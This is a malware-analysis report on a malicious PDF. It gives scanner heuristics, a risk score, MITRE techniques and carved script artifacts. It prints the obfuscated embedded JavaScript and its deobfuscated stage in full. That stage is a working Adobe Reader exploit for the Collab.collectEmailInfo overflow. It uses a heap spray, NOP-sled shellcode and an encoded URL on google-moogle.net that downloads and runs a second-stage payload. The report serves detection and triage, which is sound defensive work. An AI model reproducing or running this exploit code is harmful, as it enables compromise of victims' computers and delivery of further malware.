MALICIOUS (Risk Score: 308)
Malware Insights
MITRE ATT&CK
T1059.001 PowerShell
T1059.007 JavaScript
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including PDF_JAVASCRIPT, PDF_JS, and PDF_EVAL. The eval() call suggests the execution of obfuscated code. The extracted artifact 'javascript_obj0013_001.js' is also flagged as suspicious due to script obfuscation indicators. The primary function of the embedded script appears to be the execution of obfuscated code, likely to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (8)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; rule CVE_2007_5659, CVE exact): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- JavaScript action (low; rule PDF_JAVASCRIPT; 3 related findings): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  Matched line in script (truncated):
  function YrqIA(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I2Ka7A(rLbsKfP0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(rLbsKfP0)"+";"+"}");eval("function yJVIQbFDyG7TJ(x9um8MOLbXLt){var kvlsq571="+"0,euI8lbd52EJFD=x9um8MOLbXLt.l"+"en"+"gth,HhtKT3FG=10"+"2"+"4,pfUDCp80f3R,z4Qs5fBKtlfaf,shEKq='',uL5CABLqEne2q5=kvlsq571,Dk6FdqvEWvIDAd=kvlsq571,ecP6p=kvlsq571,rBQUy5W=Ar"+"ra"+"y(63,29,3,1,19,30,7 …
- PDF exploit shellcode contains an embedded download URL (high; rule PDF_JS_SHELLCODE_DOWNLOAD_URL): Decoded PDF exploit shellcode contains a hardcoded http(s) URL — stored as little-endian %uXXXX Unicode escapes, or hex-encoded in a document metadata field (/CreationDate, /Title) and referenced from the decoded script. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://google-moogle.net/fiesta/load.php?id=30417&spl=4 (referenced by PDF JavaScript)
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| javascript_obj0013_001.js | pdf-javascript-stream | PDF /JS object 13 at offset 0x363 | 6600 bytes |

SHA-256: 6220edd66d44560cd4db5844f2a05de38bc37fd77ea2c42f0e09ab3e52fac747
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 4 eval/decoder/string-building token(s). 169 of 246 identifiers look randomly generated (e.g. 'Qkto6UXtQktoD5ktQkoC6U0oQktV65KtQkto6UFo'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
function YrqIA(){eval("function im"+"plo"+"de(gl"+"ue,pie"+"ces){return ((pieces instanceof Array)?pie"+"ce"+"s.jo"+"in(glu"+"e):pie"+"ces);}");eval("function I2Ka7A(rLbsKfP0){return St"+"rin"+"g['fro"+"mCh"+"arC"+"ode']"+"(rLbsKfP0)"+";"+"}");eval("function yJVIQbFDyG7TJ(x9um8MOLbXLt){var kvlsq571="+"0,euI8lbd52EJFD=x9um8MOLbXLt.l"+"en"+"gth,HhtKT3FG=10"+"2"+"4,pfUDCp80f3R,z4Qs5fBKtlfaf,shEKq='',uL5CABLqEne2q5=kvlsq571,Dk6FdqvEWvIDAd=kvlsq571,ecP6p=kvlsq571,rBQUy5W=Ar"+"ra"+"y(63,29,3,1,19,30,7,62,39,44,0,0,0,0,0,0,37,47,56,57,0,18,51,5,33,26,13,12,17,41,55,59,6,54,35,52,46,31,49,20,9,34,22,0,0,0,0,16,0,32,50,23,14,43,36,11,21,10,4,15,8,28,24,61,58,25,2,53,60,45,42,40,27,38,48);f"+"o"+"r(z4Qs5fBKtlfaf=M"+"at"+"h.c"+"ei"+"l(euI8lbd52EJFD/"+"HhtKT3FG)"+";z4Qs5fBKtlfaf>kvlsq571;z4Qs5fBKtlfaf-"+"-){fo"+"r(pfUDCp80f3R=Ma"+"th.m"+"in(euI8lbd52EJFD,HhtKT3FG);pfUDCp80f3R>kvlsq571;pfUDCp80f3R-"+"-,euI8lbd52EJFD-"+"-){ecP6p|"+"=(rBQUy5W[x9um8MOLbXLt.cha"+"rCod"+"eAt(uL5CABLqEne2q5+"+"+)-48])<"+"<Dk6FdqvEWvIDAd;if(Dk6FdqvEWvIDAd){shEKq+"+"=I2Ka7A"+"(74^ecP6p&"+"2"+"5"+"5);ecP6p>"+">="+"8;Dk6FdqvEWvIDAd-"+"="+"2;}el"+"se{Dk6FdqvEWvIDAd="+"6"+";}}"+"}return (shEKq);}var 
cQktV1=implode('',['vVFiBwy','gb','@8','jmfR6v18IftEkvuDdB9b','KYJZmvV','bkffYkRWrX','v33PmfY6oX_','UmaE2','ejE','3','Ysb','iEjDPpzV','kCqyIO9b','mpBNlaz','H2PK','2DTz','N','nvGRIolblytYI','YsbiEjDPpzVkCLy','XA_Eg7lr','nBq','Nde','K8d7JrlmBa','3FDagt','JZKu','9','Y','j','3aHdmt4','5vGQ','1v','s','bi','EjDPpz','VkCG','NJvsbiE','jDPpzV','k','CMQ','1vsbiE','jDPpzVkCLZ','d0aE','d7aFlfSYnp','qQde','K8d7JrlmBa3FDagthP5RG8I','BtYk0a2Xv','s','biEjDPpzVkCG','8I','N','wPg0','_Ei7KEXf','wPPPw3','KHB4PY','JyIVw','PkeaRI7','_bXKKal2z','Rgv1','8IpX','R5Mwcip@Y5','Mj8','I','t','9rdvXH6omEr','v18I0_','bgC','f','b','iptYnwoQ','k7@8','UCoQk7@8UC','oQk','7@8U','Co','QkpVz2lt','QkC@NUltQktV','c','rFoQkbM6','rFo','QkbM8','5OoQkkz','_5C','oQkka8UCoQk','kaD2g','tQkkl850o','QkKzz2XtQkKzD2','KtQkbH_UKtQkdzaUktQkk','zz','2KtQkt','CN2KtQkkfNrKt','QkF','VDU','7oQk7H62Co','Qk','FVDU7oQktoz2','ooQkkza5Co','Qkkzz','2ltQktCN','2K','tQklK85','CoQkt','u8mo','o','Qkk9NrOoQkps85CoQkkzz5O','oQ','kkzz2KtQkg9D','Ut','oQklKN2lt','Qk','os','8mooQkt','oN5Oo','QkpsN','2','OoQkkzz','5KtQk','kz','z2','KtQkg9DUtoQklKN','2','oo','Qk','X9amoo','Qk','OMNUKtQkp','s65d','tQ','kkza5dtQ','kkzz2K','tQ','kg','9DUtoQklKN2CoQkpM8mooQkpVD5','Oo','Qkps8','mKtQkkz','_5l','tQkkz','z','2KtQ','kg9','DUtoQklK62KtQkBoa','mooQkpuzm','toQkp','sNUo','o','Q','kkzD5','FoQkkzz','2KtQkg9DUto','Q','kgzD2ltQkdS6UKt','Qk','F','uD5X','tQktVN50oQkKSNrgt','Qkkl85toQk','kzz2k','tQkl9N2KtQkFu','D','Uto','Qk','tCcrl','t','Q','kkazr','gtQkktam0oQktC6r','toQkKS6r','gtQ','kps6rFoQkkzDU7oQkkzz2','Kt','Qkbs6rKtQkKt82FoQkFV_rpoQko','X','85ooQkkzz2','KtQktVN2KtQ','kKfNrgtQkBuD','U','7','oQkBVD','UX','tQktV6r','KtQ','kXz','zr','gtQkOM8mooQkkzz2Kt','Qklz','z2Kt','Qkg9DU7oQkb','o','62ltQklzN2dtQkl9DU7oQkps','62o','oQkkzamkt','Qkkzz2','KtQ','kg','9z2XtQkBXcrKtQklfN','2K','tQkX9NmOoQkBX','8m','gtQ','kka','z','rKt','Qkb','uzmooQkkzz2K','tQkFu','z5p','o','Qk','tCc','rK','tQkkfNr','gtQ','k','ktam','0oQ','kt','C','6','rtoQk','KS6rgt','Qkgz','a5ooQkkzz','2KtQkbo
N2K','tQklSN2boQkg9z2XtQkdf_rl','tQkl','f_57','oQkOM6r','XtQkXz','zmgtQ','klfDrKtQkg9','DU7oQkbo6','2CoQklz','N2','gtQk','l9DU7oQkps','62o','oQkkz','_rXtQ','k','kzz2KtQkkzam0','o','Q','kFuz5poQkt','CcrKtQk','kS','Nr','gtQkkB','am0oQktC6rtoQkKS6r','gt','QkKza5o','oQkkzz2Kt','Q','kboN2KtQktCN5poQk','KzzrgtQkkt','am0oQktC6','rtoQkKS6rgt','Qkkza','5ooQ','kk','zz2KtQ','kgtz2KtQk','lBDr7o','Q','kpoz','2XtQkpoz2XtQkpoz2XtQ','kp','oz2X','tQkp@6U','XtQkltN2ltQktC6r','XtQ','kp','C_50','oQ','klBz','5','bo','QkpVz','5poQktC6rgtQktC8','5CoQkkSNmBoQkla','6U7oQklKN2CoQkF@','DU7oQk','tC8','2','Co','Q','kK9','NmltQkkfzmooQklKN5Xt','QkFJ6U','7oQkkf_rKtQkdf','z5XtQkgz','65','toQ','k7HNrk','tQ','k','B@z2X','tQ','kd','fDrFoQ','kkw','N5Fo','QkKzzU','OoQkOCa20oQkkS','NmltQkB','u65ktQkkfz2Bo','Qkgzz5dtQ','kOoa5','7oQkOu827oQkFuDr','OoQklt85g','t','QkpC6U7oQklt6U7','oQkkf_','rl','tQkbJc5BoQkk','f6U7oQkt','C','N','r7','oQkKf6r0','oQ','kC','H','N2XtQkkaDU7o','Qk','kfDU7o','Qkl965gt','QkBCDrBo','Qkk','zz2','ooQkOH','a','5ooQk','O','MN','5O','oQkl','9z5p','oQkg','f6rdt','QkgwNrBoQkk','z','zrOoQ','koC6UboQkoMcU7oQkBV','_5gtQkts6','5','KtQktVDUKtQkt@DUooQk','B','CD','U0oQktVDUdtQkts6UKt','Qkto6UXtQktoD5ktQkoC6U0oQktV65KtQkto6UFoQkoCcUCoQk','BV','D','UOoQkt','VDUXtQk','tC6','UOoQk','o','M65ktQ','koM6Ub','oQ','kt','Jc5KtQk','CCD','U7oQkCMc5Co','Q','kCuc57oQkBVc5ooQkoMcUCoQkCC','DU','XtQkpMc57HQ','n','VMPkeaRIy','t','bl','b','sFPIaR','U2S','R','jkw','Q1vM8K7M8','5','pM','85VMPke','aRIGSYlr','S','N5qfbmB','B3','gv18','IEBLk8fDqyt','rXu','BRlv','3yIB','G8','It9rdvuF','iFMR','U','RDr','6d','nzKDBrU','v18Iyt','bl','bsFPI','aRU2S','RjkwQq','v','XZ3','ulYDoucPMK6d5zEnpX45b','JZm','vVFiBwZgelLDnw260f8INMQkftEdM9YdAlPI','AoFmpJ85A','oFmpJ','85wJZmvsb','iEjDP','p','zVk','CMQ1v33Pm','fY6oX_UmaE2ejE3Ys','b','iEjD','PpzV','kCqyIO9','b','mpB','NlazH2PK2DTz','NnVMPke','aRI','@SNmB','JRI','N','Myn','7','_bXKKal2zRgv1yI','pXRUp','M','85p','MNn@qbgRl','ckxw3d7J_kEt_mvV','E','XBwy','nt9rdvXRj','x','D','D','rmK8PBlHPw
93','dNMcmblVPDaD6','FM3dEw3ixaR1','@SNmBJ','4mblVPDa','D6FM3dE','w3i','xa4','nHJyIVwygb@8jm','fR6LlRjxDDrmK','8P','BlHPw9','3','dcwQ1vsbiE','jD','Ppz','Vk','CMZnvXH6omErV','MQJ','v1R','I9t2XMB','Fl@_','YIez6lg','t3ik_Yjyf6','2YJy','IV','w','PkeaR','I','l','lFXp','lF2qS','cUom','r3v18Ie','wRdf','V','F','lA','SF','gBzVgBfFl@_rq7WEP7aF','lfSYnR','G8Ill','FXplF','2q','Sc','Uomr3v18IllFXplF2qScU','o','mr3fH','FgpnbiMtYn@','qH2@sYq','wHQnVMPkeaRI','rzHUBl_Xo96Knfb2KwQ1v','LbgowQrBaFiFlPr','bmYd','bt','_','Posc','k8_DqMlbiB9','akYMNnyH','aK8','wRK','kfLUosFXj_ZiY9rdgBRnOJ','yqllFXpl','F2q','ScUomr3f@Yl','eaFr7lP','5RJ','Z','mvJrgvXynrzHUBl','_Xo96','Knf','b','2KjH5','cw','Q1NM','ymvVPxv','XynrzHUBl_','Xo96Knfb2KjV','5cw','Q','1NMQ5vVPxvXD67HR','D@SF5z','a','Likz_jB1HIQMP5RM','yJ','QwyD','mB6','drWEkO32PMtD2L9N','G','vq8','IOJQnvq','R','JvXy','Dm','B6d','rWEkO32','PMtD2LwNGv1N1v','s8I9V','yIr','zHU','B','l_Xo9','6Knf','b2','KjV5cw','y1vuNnvqRJvXy','DmB6drWEkO32PM','tD2LwNGvq8IoJ','Qnv','GRIn','na','PzjY','kqlQnV','MP','kea','RI','ql_3m98INMQkftEdM9Y','dAl','PI','AoR','5MwciAo','R5','M','wc','i','wJZ','mvs','R','lR','nbg','Y@','HDGzV5','fqbg','fSYkYwy','1vC8U','Fo65','R','MZPr','WD6','OMZn','NMZPrWD6','OG8','I','7lblC_Zi@nYXe','a','E','P7WrdAwQ1v@_Xy','nbi','w_','Zi@nYXAfYkkmbiRnbDfzEXYG4d0a','rl','zMPIwqQXCS','rmv','@HDG','zV5N','KZmv1R','INwQi','t3brUa','b2flHXCV','anRG6']);");eval(yJVIQbFDyG7TJ(cQktV1));}

| Filename | Kind | Source | Size |
|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery sixbit-xor-table from JavaScript object 13 at offset 0x363 | 2675 bytes |

SHA-256: ffb6d09a4fb7b00f29a788701c7e62b15473ecfdb31b81577732a59f42d200da
Detection: ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 3 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
var d83XVsT = new Array(); function ZRVcT7H7VbGakO(gaXKRpVu3, qa9p4ijVDLyJd6) { while (gaXKRpVu3.length*2<qa9p4ijVDLyJd6){gaXKRpVu3 += gaXKRpVu3;} gaXKRpVu3 = gaXKRpVu3.substring(0,qa9p4ijVDLyJd6/2); return gaXKRpVu3; } function RLPzktS() { var tnmFIhIvd = 0x0c0c0c0c; var XTwmC = unescape("%u4343%u4343%u4343%u0FEB%u335B%u66C9%u80B9%u8001%uEF33%uE243%uEBFA%uE805%uFFEC%uFFFF%u8B7F%uDF4E%uEFEF%u64EF%uE3AF%u9F64%u42F3%u9F64%u6EE7%uEF03%uEFEB%u64EF%uB903%u6187%uE1A1%u0703%uEF11%uEFEF%uAA66%uB9EB%u7787%u6511%u07E1%uEF1F%uEFEF%uAA66%uB9E7%uCA87%u105F%u072D%uEF0D%uEFEF%uAA66%uB9E3%u0087%u0F21%u078F%uEF3B%uEFEF%uAA66%uB9FF%u2E87%u0A96%u0757%uEF29%uEFEF%uAA66%uAFFB%uD76F%u9A2C%u6615%uF7AA%uE806%uEFEE%uB1EF%u9A66%u64CB%uEBAA%uEE85%u64B6%uF7BA%u07B9%uEF64%uEFEF%u87BF%uF5D9%u9FC0%u7807%uEFEF%u66EF%uF3AA%u2A64%u2F6C%u66BF%uCFAA%u1087%uEFEF%uBFEF%uAA64%u85FB%uB6ED%uBA64%u07F7%uEF8E%uEFEF%uAAEC%u28CF%uB3EF%uC191%u288A%uEBAF%u8A97%uEFEF%u9A10%u64CF%uE3AA%uEE85%u64B6%uF7BA%uAF07%uEFEF%u85EF%uB7E8%uAAEC%uDCCB%uBC34%u10BC%uCF9A%uBCBF%uAA64%u85F3%uB6EA%uBA64%u07F7%uEFCC%uEFEF%uEF85%u9A10%u64CF%uE7AA%uED85%u64B6%uF7BA%uFF07%uEFEF%u85EF%u6410%uFFAA%uEE85%u64B6%uF7BA%uEF07%uEFEF%uAEEF%uBDB4%u0EEC%u0EEC%u0EEC%u0EEC%u036C%uB5EB%u64BC%u0D35%uBD18%u0F10%u64BA%u6403%uE792%uB264%uB9E3%u9C64%u64D3%uF19B%uEC97%uB91C%u9964%uECCF%uDC1C%uA626%u42AE%u2CEC%uDCB9%uE019%uFF51%u1DD5%uE79B%u212E%uECE2%uAF1D%u1E04%u11D4%u9AB1%uB50A%u0464%uB564%uECCB%u8932%uE364%u64A4%uF3B5%u32EC%uEB64%uEC64%uB12A%u2DB2%uEFE7%u1B07%u1011%uBA10%uA3BD%uA0A2%uEFA1%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6F6D%u676F%u656C%u6E2E%u7465%u662F%u6569%u7473%u2F61%u6F6C%u6461%u702E%u7068%u693F%u3D64%u3033%u3134%u2637%u7073%u3D6C%u0034"); var lei8wQPr4IwXE = 0x400000; var OghH71Sc9rTf = XTwmC.length * 2; var qa9p4ijVDLyJd6 = lei8wQPr4IwXE - (OghH71Sc9rTf+0x38); var gaXKRpVu3 = unescape("%u9090%u9090"); gaXKRpVu3 = ZRVcT7H7VbGakO(gaXKRpVu3, qa9p4ijVDLyJd6); var o792y = (tnmFIhIvd - 0x400000)/lei8wQPr4IwXE; for (var 
xXQJBV9PrXPbQr=0;xXQJBV9PrXPbQr<o792y;xXQJBV9PrXPbQr++) { d83XVsT[xXQJBV9PrXPbQr] = gaXKRpVu3 + XTwmC; } } function a6jAUbEnXl3F() { var BxmpxES77wmN = app.viewerVersion.toString(); BxmpxES77wmN = BxmpxES77wmN.replace(/\D/g,""); var HV4rHow1zRcEF = new Array(BxmpxES77wmN.charAt(0),BxmpxES77wmN.charAt(1),BxmpxES77wmN.charAt(2)); if ((HV4rHow1zRcEF[0] == 8 && ((HV4rHow1zRcEF[1] == 1 && HV4rHow1zRcEF[2] < 2) || HV4rHow1zRcEF[1] < 1)) || (HV4rHow1zRcEF[0] == 7 && HV4rHow1zRcEF[1] < 1) || (HV4rHow1zRcEF[0] < 7)) { RLPzktS(); var SHOV1 = unescape("%u0c0c%u0c0c"); while(SHOV1.length < 44952) SHOV1 += SHOV1; this.collabStore = Collab.collectEmailInfo({subj: "",msg: SHOV1}); } } a6jAUbEnXl3F();